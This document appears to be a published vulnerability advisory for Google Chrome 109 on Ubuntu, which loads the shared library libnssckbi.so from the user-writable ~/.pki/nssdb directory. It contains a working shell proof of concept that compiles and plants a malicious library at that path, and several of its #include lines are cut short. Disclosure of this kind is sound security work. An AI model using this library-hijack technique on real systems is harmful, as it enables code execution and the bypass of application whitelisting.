#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu) Product: Google Chrome Discovered by: Rafay Baloch and Muhammad Samak #Version: 109.0.5414.74 #Impact: Moderate #Company: Cyber Citadel #Website: https://www.cybercitadel.com #Tested-on : Ubuntu 22.04.1 *Description* Google chrome attempts to load the 'libssckbi.so' file from a user-writable location. PATH: /home/$username/.pki/nssdb/libnssckbi.so Since the Shared Library 'ibnssckbi.so' specified path is writeable. It is possible to achieve the Code Execution by placing the malicious file with the name `libnssckbi.so` in the specified path. *exploit* Following is the POC that could be used to reproduce the issue: echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..." echo "[*] Checking /.pki/nssdb PATH" if [ -d "/home/haalim/.pki/nssdb" ] then echo "[+] Directory Exists..." if [ -w "/home/haalim/.pki/nssdb" ] then echo "[+] Directory is writable..." echo "[+] Directory is writable..." echo "[+] Generating malicious File libnssckbi.so ..." echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c echo "#include " >> /home/haalim/.pki/nssdb/exploit.c echo "#include " >> /home/haalim/.pki/nssdb/exploit.c echo "#include " >> /home/haalim/.pki/nssdb/exploit.c echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c echo "}" >> /home/haalim/.pki/nssdb/exploit.c gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o fi fi Upon closing the browser windows, the application executes the malicious code *Impact* The attacker can use this behavior to bypass the application whitelisting rules. This behavior can also lead to DoS attacks. An attacker can trick a victim into supplying credentials by creating a fake prompt.